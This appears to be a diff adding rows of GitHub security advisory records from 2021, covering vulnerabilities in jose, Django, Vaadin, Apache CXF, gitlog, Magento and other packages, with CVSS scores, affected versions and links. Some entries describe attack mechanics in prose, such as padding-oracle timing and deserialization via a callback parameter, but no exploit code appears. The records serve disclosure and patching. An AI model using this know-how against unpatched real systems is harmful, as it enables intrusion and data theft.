+1.4.0,GHSA-58f5-hfqc-jgch,2021-04-16T23:01:38Z,2021-04-19T14:57:22Z,,['CVE-2021-29443'],Padding Oracle Attack due to Observable Timing Discrepancy in jose,"jose is an npm library providing a number of cryptographic operations.
+### Impact
+
+[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block).
+
+### Patches
+
+All major release versions have had a patch released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `^1.28.1 || ^2.0.5 || >=3.11.4`.
+
+Users should upgrade their v1.x dependency to [`^1.28.1`](https://github.com/panva/jose/releases/tag/v1.28.1), their v2.x dependency to [`^2.0.5`](https://github.com/panva/jose/releases/tag/v2.0.5), and their v3.x dependency to [`^3.11.4`](https://github.com/panva/jose/releases/tag/v3.11.4)
+
+### Credits
+Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.28.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-58f5-hfqc-jgch'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29443'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose'}]","{'cwe_ids': ['CWE-203', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:01:38Z', 'nvd_published_at': '2021-04-16T18:15:00Z'}"
+1.4.0,GHSA-7jgj-8wvc-jh57,2021-04-21T19:15:50Z,2021-04-21T19:16:06Z,,['CVE-2018-8292'],.NET Core Information Disclosure,"An information disclosure vulnerability exists in .NET Core when authentication information is inadvertently exposed in a redirect, aka "".NET Core Information Disclosure Vulnerability."" This affects .NET Core 2.1, .NET Core 1.0, .NET Core 1.1, PowerShell Core 6.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Net.Http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-8292'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/88'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2018:2902'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8292'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/105548'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:15:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6hrm-jqp3-64cv,2023-01-26T22:35:31Z,2021-04-13T15:42:36Z,,['CVE-2020-24393'],Improper Certificate Validation in TweetStream,TweetStream 2.6.1 uses the library eventmachine in an insecure way that does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'tweetstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24393'}, {'type': 'PACKAGE', 'url': 'https://github.com/tweetstream/tweetstream'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-096-tweetstream-tweetstream'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:54:38Z', 'nvd_published_at': '2021-02-19T23:15:00Z'}"
+1.4.0,GHSA-qg7c-q3vq-rgxr,2021-04-12T22:32:54Z,2021-04-13T15:13:26Z,,[],Leak of information via Store-API aggregations in shopware/platform and shopware/core,"### Impact
+
+Leak of information via Store-API
+
+### Patches
+We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-qg7c-q3vq-rgxr'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:32:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8hw9-22v6-9jr9,2021-04-16T23:04:15Z,2021-04-19T15:14:33Z,,['CVE-2021-29452'],Any logged in user could edit any other logged in user.,"### Impact
+Everyone who is running a12n-server.
+
+A new HAL-Form was added to allow editing users. This feature should only have been accessible to admins. Unfortunately, privileges were incorrectly checked allowing any logged in user to make this change.
+
+### Patches
+Patched in v0.18.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@curveball/a12n-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/curveball/a12n-server/security/advisories/GHSA-8hw9-22v6-9jr9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29452'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@curveball/a12n-server'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:04:15Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}"
+1.4.0,GHSA-4vp3-vfww-8648,2021-04-09T22:11:38Z,2021-04-13T15:48:05Z,,['CVE-2020-29454'],Incorrect permission enforcement in UmbracoCms,Editors/LogViewerController.cs in Umbraco through 8.9.1 allows a user to visit a logviewer endpoint even if they lack Applications.Settings access.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoCms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29454'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/pull/9361'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T22:11:38Z', 'nvd_published_at': '2020-12-02T02:15:00Z'}"
+1.4.0,GHSA-35mm-cc6r-8fjp,2023-08-08T15:34:06Z,2021-04-07T20:58:47Z,,['CVE-2020-8264'],Cross-site scripting in actionpack,"In actionpack gem >= 6.0.0, a possible XSS vulnerability exists when an application is running in development mode allowing an attacker to send or embed (in another page) a specially crafted URL which can allow the attacker to execute JavaScript in the context of the local application. This vulnerability is in the Actionable Exceptions middleware.
+
+Workarounds
+-----------
+Until such time as the patch can be applied, application developers should disable the Actionable Exceptions middleware in their development environment via a line such as this one in their config/environment/development.rb: `config.middleware.delete ActionDispatch::ActionableExceptions`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8264'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/904059'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8264.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk/m/oJWw-xhNAQAJ'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:19:13Z', 'nvd_published_at': '2021-01-06T21:15:00Z'}"
+1.4.0,GHSA-25xc-jwfq-39jw,2022-08-15T20:03:44Z,2021-04-19T14:50:49Z,,['CVE-2021-31407'],OSGi applications using Vaadin 12-14 and 19 vulnerable to server classes and resources exposure,"Vulnerability in OSGi integration in `com.vaadin:flow-server` versions 1.2.0 through 2.4.7 (Vaadin 12.0.0 through 14.4.9), and 6.0.0 through 6.0.1 (Vaadin 19.0.0) allows attacker to access application classes and resources on the server via crafted HTTP request.
+
+- https://vaadin.com/security/cve-2021-31407","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '2.4.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.4.7'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.1'}]}], 'versions': ['6.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-25xc-jwfq-39jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31407'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/osgi/issues/50'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10229'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10269'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31407'}]","{'cwe_ids': ['CWE-402', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:42Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-64x2-gq24-75pv,2021-04-20T22:19:53Z,2021-04-22T16:15:23Z,,['CVE-2020-13954'],Cross-site scripting in Apache CXF,"By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13954'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cdev.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cusers.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r640719c9ce5671f239a6f002c20e14062effe4b318a580b6746aa5ef@%3Cdev.syncope.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r81a41a2915985d49bc3ea57dde2018b03584a863878a8532a89f993f@%3Cusers.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0010/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://cxf.apache.org/security-advisories.data/CVE-2020-13954.txt.asc?version=1&modificationDate=1605183670659&api=v2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/11/12/2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:19:53Z', 'nvd_published_at': '2020-11-12T13:15:00Z'}"
+1.4.0,GHSA-h8hx-2c5r-32cf,2021-04-13T17:01:38Z,2021-04-13T17:01:50Z,,['CVE-2021-29435'],Cross-Site Request Forgery (CSRF) in trestle-auth,"### Impact
+A vulnerability in trestle-auth versions 0.4.0 and 0.4.1 allows an attacker to create a form that will bypass Rails' built-in CSRF protection when submitted by a victim with a trestle-auth admin session. This potentially allows an attacker to alter protected data, including admin account credentials.
+
+### Patches
+The vulnerability has been fixed in trestle-auth 0.4.2 released to RubyGems.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [trestle-auth](https://github.com/TrestleAdmin/trestle-auth/issues)
+* Email the maintainer at [sam@sampohlenz.com](mailto:sam@sampohlenz.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'trestle-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TrestleAdmin/trestle-auth/security/advisories/GHSA-h8hx-2c5r-32cf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29435'}, {'type': 'WEB', 'url': 'https://github.com/TrestleAdmin/trestle-auth/commit/cb95b05cdb2609052207af07b4b8dfe3a23c11dc'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/trestle-auth/CVE-2021-29435.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/trestle-auth'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T17:01:38Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}"
+1.4.0,GHSA-c6c4-7x48-4cqp,2021-10-08T21:24:15Z,2021-04-19T14:47:47Z,,[],"Timing side channel vulnerability in UIDL request handler in Vaadin 10, 11-14, and 15-18","Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:flow-server` versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack.
+
+- https://vaadin.com/security/cve-2021-31404","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '18.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-c6c4-7x48-4cqp'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31404'}]","{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:13:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-67mm-m3wx-j7fr,2022-04-27T19:13:33Z,2021-04-13T15:15:29Z,,['CVE-2021-26541'],Command injection in gitlog,The gitlog function in src/index.ts in gitlog before 4.0.4 has a command injection vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gitlog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26541'}, {'type': 'WEB', 'url': 'https://github.com/domharrington/node-gitlog/pull/65'}, {'type': 'WEB', 'url': 'https://github.com/domharrington/node-gitlog/pull/65/commits/bb22ffb2c907e0284f887ab625e12b88c31f4bf4'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2020-4301'}, {'type': 'PACKAGE', 'url': 'https://github.com/domharrington/node-gitlog'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/gitlog'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:05:05Z', 'nvd_published_at': '2021-02-08T17:15:00Z'}"
+1.4.0,GHSA-qr9h-vr5p-pwwx,2022-04-18T21:56:34Z,2021-04-12T18:59:11Z,,['CVE-2020-27543'],Denial of Service (DoS) in restify-paginate,The restify-paginate package 0.0.5 for Node.js allows remote attackers to cause a Denial-of-Service by omitting the HTTP Host header. A Restify-based web service would crash with an uncaught exception.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'restify-paginate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27543'}, {'type': 'PACKAGE', 'url': 'https://github.com/paulvarache/restify-paginate/'}, {'type': 'WEB', 'url': 'https://github.com/secoats/cve/tree/master/CVE-2020-27543_dos_restify-paginate'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210401-0002/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/restify-paginate'}]","{'cwe_ids': ['CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:43:59Z', 'nvd_published_at': '2021-02-25T17:15:00Z'}"
+1.4.0,GHSA-mm4f-47ch-f7hx,2022-07-05T18:00:53Z,2021-04-13T15:32:43Z,,['CVE-2021-23363'],Arbitrary code execution in kill-by-port,"This affects the package kill-by-port before 0.0.2. If (attacker-controlled) user input is given to the killByPort function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-by-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23363'}, {'type': 'WEB', 'url': 'https://github.com/GuyMograbi/kill-by-port/commit/ea5b1f377e196a4492e05ff070eba8b30b7372c4'}, {'type': 'PACKAGE', 'url': 'https://github.com/GuyMograbi/kill-by-port'}, {'type': 'WEB', 'url': 'https://github.com/GuyMograbi/kill-by-port/blob/16dcbe264b6b4a5ecf409661b42836dd286fd43f/index.js#23L8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLBYPORT-1078531'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:18:57Z', 'nvd_published_at': '2021-03-30T15:15:00Z'}"
+1.4.0,GHSA-c9g6-9335-x697,2021-04-06T21:47:25Z,2021-04-13T15:27:51Z,,['CVE-2020-7693'],Improper Input Validation in SocksJS-Node,Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'sockjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7693'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/issues/252'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/pull/265'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/commit/dd7e642cd69ee74385825816d30642c43e051d16'}, {'type': 'WEB', 'url': 'https://github.com/andsnw/sockjs-dos-py'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575448'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SOCKJS-575261'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/sockjs'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:47:25Z', 'nvd_published_at': '2020-07-09T14:15:00Z'}"
+1.4.0,GHSA-m496-x567-f98c,2021-04-30T20:19:58Z,2021-04-22T16:10:49Z,,['CVE-2021-21426'],Fixes a bug in Zend Framework's Stream HTTP Wrapper,"### Impact
+CVE-2021-3007: Backport of Zend_Http_Response_Stream, added certain type checking as a way to prevent exploitation. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007
+
+This vulnerability is caused by the unsecured deserialization of an object. In versions higher than Zend Framework 3.0.0, the attacker abuses the Zend3 feature that loads classes from objects in order to upload and execute malicious code in the server. The code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the “callbackOptions” array.
+
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+v20.0.9 v19.4.13","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.4.12'}}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 20.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21426'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:16:53Z', 'nvd_published_at': '2021-04-21T21:15:00Z'}"
+1.4.0,GHSA-xgxc-v2qg-chmh,2021-04-30T20:43:54Z,2021-04-08T18:11:48Z,,['CVE-2021-28658'],Directory Traversal in Django,"In Django 2.2 before 2.2.20, 3.0 before 3.0.14, and 3.1 before 3.1.8, MultiPartParser allowed directory traversal via uploaded files with suitably crafted file names. Built-in upload handlers were not affected by this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.20'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.14'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28658'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/django-announce/c/ePr5j-ngdPU'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVKYPHR3TKR2ESWXBPOJEKRO2OSJRZUE/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Django/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0001/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/apr/06/security-releases/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T18:11:26Z', 'nvd_published_at': '2021-04-06T15:15:00Z'}"
